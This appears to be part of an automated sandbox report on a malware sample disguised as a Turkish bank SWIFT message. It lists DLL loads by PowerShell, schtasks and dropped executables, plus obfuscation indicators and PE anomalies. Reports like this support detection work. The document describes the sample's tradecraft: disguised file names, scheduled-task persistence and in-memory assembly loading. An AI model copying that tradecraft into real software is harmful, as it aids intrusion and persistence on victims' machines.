                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Section loaded: msvfw32.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\regasms.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\regasms.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: Binary string: NVBx.pdb source: regasms.exe, 0000000D.00000000.1359680511.0000000000352000.00000002.00000001.01000000.00000006.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr
                  Source: Binary string: NVBx.pdbSHA256V- source: regasms.exe, 0000000D.00000000.1359680511.0000000000352000.00000002.00000001.01000000.00000006.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.dr

                  Data Obfuscation

                  Source: 13.2.regasms.exe.399cdd8.2.raw.unpack, uYCig1sF66qVjL68U1.cs.Net Code: pYUtkxyyMV System.Reflection.Assembly.Load(byte[])
                  Source: 13.2.regasms.exe.39f37f8.3.raw.unpack, uYCig1sF66qVjL68U1.cs.Net Code: pYUtkxyyMV System.Reflection.Assembly.Load(byte[])
                  Source: 13.2.regasms.exe.7190000.5.raw.unpack, uYCig1sF66qVjL68U1.cs.Net Code: pYUtkxyyMV System.Reflection.Assembly.Load(byte[])
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: 15.2.regasms.exe.321d84c.1.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: 15.2.regasms.exe.3230128.0.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: regasms.exe.5.drStatic PE information: 0xBC4E8C9C [Mon Feb 10 13:26:52 2070 UTC]
                  Source: AtkzppDHiyvcIR.exe.13.drStatic PE information: real checksum: 0x0 should be: 0xa98a1
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: real checksum: 0x1e857 should be: 0x1e642
                  Source: regasms.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xa98a1
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: BVOtlE
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: TZlC
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: Nz
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: O
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: VkmH8y1
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: wN
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: F7SI
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: E6qQ
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: Lr
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: AN
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: f
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 5P0fnl
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: V
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: OwHk
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 6Hmqv
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: APW
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: ZLm
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 08bnu
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: cnEkflK
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: J
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: xym0og
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 50
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 4
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: LQ1yM4J
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: cMmi
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 2c7K
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: MB
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: WRrW
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: N8vzTDl
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: St
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: K
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: gg
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: AXK
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: g1Qden
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: hE
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: QMHTWAj
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: rW8cfn
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: rdMxwzY
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 6bxL1rP
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: cv
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: 0oGzWw2
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: j7XIq
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: IW9am
                  Source: Ziraat Bankasi Swift Mesaji.dqy.dllStatic PE information: section name: QtuG
